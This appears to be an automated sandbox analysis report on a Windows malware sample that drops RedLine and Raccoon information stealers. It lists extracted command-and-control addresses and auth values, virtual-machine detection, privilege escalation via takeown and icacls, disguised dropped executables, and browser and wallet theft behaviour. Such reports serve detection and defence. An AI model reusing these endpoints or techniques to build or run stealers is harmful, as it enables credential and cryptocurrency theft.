Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-1703_x64 -
resource
win10-20220718-en -
resource tags
arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system -
submitted
08-08-2022 17:29
Static task
static1
Behavioral task
behavioral1
Sample
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
Resource
win10-20220718-en
General
-
Target
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
-
Size
860KB
-
MD5
8f8d654c2fa15bb497f14db0bd2d00a1
-
SHA1
432a7601bc0607257a956e86f39003eb32eb7334
-
SHA256
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6
-
SHA512
7a505ec7e96414fe8b972f87cb96e661122df222a44476f1ab3f585e19ad7d698484c0d39a6ff2433fbbe718305c1dad14ddb9a643b36bf844896038a4fb42bd
Malware Config
Extracted
redline
nam3
103.89.90.61:18728
-
auth_value
64b900120bbceaa6a9c60e9079492895
Extracted
redline
4
31.41.244.134:11643
-
auth_value
a516b2d034ecd34338f12b50347fbd92
Extracted
redline
@tag12312341
62.204.41.144:14096
-
auth_value
71466795417275fac01979e57016e277
Extracted
raccoon
afb5c633c4650f69312baef49db9dfa4
http://77.73.132.74
Extracted
raccoon
f0c8034c83808635df0d9d8726d1bfd6
http://45.95.11.158/
Extracted
redline
5076357887
195.54.170.157:16525
-
auth_value
0dfaff60271d374d0c206d19883e06f3
Extracted
redline
alfa
46.175.148.142:32178
-
auth_value
5f6c4b42c0bce31d7557ce1726a401c5
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
Raccoon Stealer payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/4768-600-0x0000000003090000-0x00000000030A6000-memory.dmp family_raccoon behavioral1/memory/4768-603-0x0000000000400000-0x0000000000482000-memory.dmp family_raccoon behavioral1/memory/5008-676-0x0000000000400000-0x000000000062B000-memory.dmp family_raccoon behavioral1/memory/5008-672-0x0000000000030000-0x000000000003F000-memory.dmp family_raccoon behavioral1/memory/5008-721-0x0000000000400000-0x000000000062B000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 15 IoCs
Processes:
resource yara_rule C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe family_redline C:\Program Files (x86)\Company\NewProduct\safert44.exe family_redline C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe family_redline C:\Program Files (x86)\Company\NewProduct\safert44.exe family_redline behavioral1/memory/4676-459-0x0000000000F30000-0x0000000000F74000-memory.dmp family_redline behavioral1/memory/4720-461-0x0000000000280000-0x00000000002C4000-memory.dmp family_redline C:\Program Files (x86)\Company\NewProduct\tag.exe family_redline C:\Program Files (x86)\Company\NewProduct\tag.exe family_redline behavioral1/memory/4196-639-0x0000000000B10000-0x0000000000B30000-memory.dmp family_redline C:\Program Files (x86)\Company\NewProduct\jshainx.exe family_redline C:\Program Files (x86)\Company\NewProduct\jshainx.exe family_redline C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe family_redline behavioral1/memory/4868-771-0x0000000000380000-0x00000000003A0000-memory.dmp family_redline C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe family_redline behavioral1/memory/4112-837-0x0000000000460000-0x0000000000480000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4868 created 3660 4868 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEdescription pid process target process PID 5068 created 548 5068 powershell.EXE winlogon.exe PID 4140 created 3660 4140 svchost.exe DllHost.exe PID 4140 created 1912 4140 svchost.exe DllHost.exe PID 5972 created 548 5972 powershell.EXE winlogon.exe PID 5972 created 548 5972 powershell.EXE winlogon.exe PID 4140 created 3660 4140 svchost.exe DllHost.exe -
Enumerates VirtualBox DLL files 2 TTPs 20 IoCs
Processes:
svchost.exeupdate.exedescription ioc process File opened (read-only) C:\windows\System32\vboxoglarrayspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxhook.dll update.exe File opened (read-only) C:\windows\System32\vboxoglarrayspu.dll update.exe File opened (read-only) C:\windows\System32\vboxoglerrorspu.dll update.exe File opened (read-only) C:\windows\System32\vboxoglpackspu.dll update.exe File opened (read-only) C:\windows\System32\vboxdisp.dll svchost.exe File opened (read-only) C:\windows\System32\vboxhook.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglerrorspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxmrxnp.dll update.exe File opened (read-only) C:\windows\System32\vboxoglfeedbackspu.dll update.exe File opened (read-only) C:\windows\System32\vboxoglpassthroughspu.dll update.exe File opened (read-only) C:\windows\System32\vboxmrxnp.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglcrutil.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglpackspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxdisp.dll update.exe File opened (read-only) C:\windows\System32\vboxogl.dll update.exe File opened (read-only) C:\windows\System32\vboxoglcrutil.dll update.exe File opened (read-only) C:\windows\System32\vboxogl.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglfeedbackspu.dll svchost.exe File opened (read-only) C:\windows\System32\vboxoglpassthroughspu.dll svchost.exe -
Looks for VirtualBox drivers on disk 2 TTPs 8 IoCs
Processes:
update.exesvchost.exedescription ioc process File opened (read-only) C:\windows\System32\Drivers\VBoxGuest.sys update.exe File opened (read-only) C:\windows\System32\Drivers\VBoxSF.sys update.exe File opened (read-only) C:\windows\System32\Drivers\VBoxVideo.sys update.exe File opened (read-only) C:\windows\System32\Drivers\VBoxMouse.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\VBoxGuest.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\VBoxSF.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\VBoxVideo.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\VBoxMouse.sys update.exe -
Looks for VirtualBox executables on disk 2 TTPs 6 IoCs
Processes:
update.exesvchost.exedescription ioc process File opened (read-only) C:\windows\System32\vboxtray.exe update.exe File opened (read-only) C:\windows\System32\VBoxControl.exe update.exe File opened (read-only) C:\windows\System32\vboxservice.exe svchost.exe File opened (read-only) C:\windows\System32\vboxtray.exe svchost.exe File opened (read-only) C:\windows\System32\VBoxControl.exe svchost.exe File opened (read-only) C:\windows\System32\vboxservice.exe update.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 15 IoCs
Processes:
namdoitntn.exereal.exesafert44.exekukurzka9000.exeF0geI.exetag.exejshainx.exeMouseAtHome.exeEU1.exeWindowsDefender.exeWindows.exeWindows Defender.exesvchost.exeupdate.exeupdater.exepid process 4676 namdoitntn.exe 4688 real.exe 4720 safert44.exe 4768 kukurzka9000.exe 5008 F0geI.exe 4196 tag.exe 4868 jshainx.exe 4112 MouseAtHome.exe 6068 EU1.exe 4832 WindowsDefender.exe 5220 Windows.exe 5796 Windows Defender.exe 6084 svchost.exe 6124 update.exe 4676 updater.exe -
Looks for VMWare drivers on disk 2 TTPs 6 IoCs
Processes:
update.exesvchost.exedescription ioc process File opened (read-only) C:\windows\System32\Drivers\vmusbmouse.sys update.exe File opened (read-only) C:\windows\System32\Drivers\Vmmouse.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\vmci.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\vmusbmouse.sys svchost.exe File opened (read-only) C:\windows\System32\Drivers\Vmmouse.sys update.exe File opened (read-only) C:\windows\System32\Drivers\vmci.sys update.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4832 takeown.exe 5132 icacls.exe 5040 takeown.exe 6380 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Windows.exe upx behavioral1/memory/5220-1053-0x0000000000400000-0x0000000000736000-memory.dmp upx behavioral1/memory/5220-1138-0x0000000000400000-0x0000000000736000-memory.dmp upx C:\Users\Admin\AppData\Local\svchost.exe upx C:\Users\Admin\AppData\Local\svchost.exe upx behavioral1/memory/6084-1161-0x00007FF6063B0000-0x00007FF60672B000-memory.dmp upx C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Control Panel\International\Geo\Nation 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe -
Drops startup file 1 IoCs
Processes:
update.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk update.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 6380 icacls.exe 4832 takeown.exe 5132 icacls.exe 5040 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 7 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
conhost.exepowershell.EXEpowershell.EXEconhost.exedescription pid process target process PID 4196 set thread context of 5572 4196 conhost.exe conhost.exe PID 5068 set thread context of 5448 5068 powershell.EXE dllhost.exe PID 5972 set thread context of 6728 5972 powershell.EXE dllhost.exe PID 2112 set thread context of 4772 2112 conhost.exe dialer.exe -
Drops file in Program Files directory 13 IoCs
Processes:
598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exeWindows.exepowershell.execonhost.exedescription ioc process File opened for modification C:\Program Files (x86)\Company\NewProduct\real.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\tag.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jshainx.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\EU1.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File created C:\Program Files\Google\Chrome\Application\launcher.exe Windows.exe File created C:\Program Files\Defender\updater.exe powershell.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\safert44.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\F0geI.exe 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe File opened for modification C:\Program Files\Defender\updater.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Drops file in Windows directory 14 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.execonhost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4892 sc.exe 5644 sc.exe 2192 sc.exe 7056 sc.exe 6108 sc.exe 6148 sc.exe 4600 sc.exe 5796 sc.exe 5220 sc.exe 4876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5276 4688 WerFault.exe real.exe 6196 3660 WerFault.exe DllHost.exe 6284 1912 WerFault.exe DllHost.exe 4868 3660 WerFault.exe DllHost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
real.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 real.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString real.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEpowershell.EXEpowershell.execonhost.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b365015b5dabd801 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000087e1163c2fd65e04bd5578a618c6c7ff7facb5635045471ccc96b069124e8a6fd4235c5980af5a1892e7f2d8a5ab5106101b19be1e991fee82ba40ca89824d5ae0a66bbf58c6c28648c4896eeeb66058e61a6a64533a2ca7acf7b329ae6b0900bd0a336483393f3c3089d1387006f4c6734b4e186a48aa5585ed9d57342afef927f0275f4e2aea4ed9d76b2838bb7cc81b4d078272e388e9043ce8d11bdde7e84ef6b77498b758623a4f439136f5afdaf0bf26003f2b0dbd6684a92680a5894c40bd08af730217d59e8f4ad4aed3cd372a432d8cc440beeb1065a3ee3da33a96aee55b0aa42980c25339e320d5773ddc527810aa8a42f87c257f785254f5e497c70e982d6e4e11d379eb17a12c00ead8cbfd186fa851565a22726c1febbc3143c1d85d369f8fbddd8646e548438e54f90e74bb90e98d191a94dd696f8718cfb328e40892430eef553aebd87e894035b8687c2e87f6160297af62b7df5f2a0c8b19d0cceb49eac18dfc789b5fcb382783d6b423c3cf0c1c58b7a052580610b9a0143d3720fb42d0c77a8ff28a0595ad4f59be39eda28f1acaf4406b09cace9c9abe928407751d1171 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local 